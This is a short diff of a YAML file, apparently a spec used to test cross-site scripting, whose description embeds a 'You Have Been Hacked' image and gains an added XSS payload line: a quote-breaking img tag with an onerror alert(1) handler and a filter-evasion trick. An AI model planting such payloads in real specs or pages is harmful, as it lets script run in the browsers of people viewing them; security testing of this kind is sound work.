--- a/xss3.yaml
+++ b/xss3.yaml
@@ -3,3 +3,4 @@ info:
   title: your system got hacked
   description: |
     <img src="https://upload.wikimedia.org/wikipedia/commons/2/26/You_Have_Been_Hacked!.jpg">
+`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
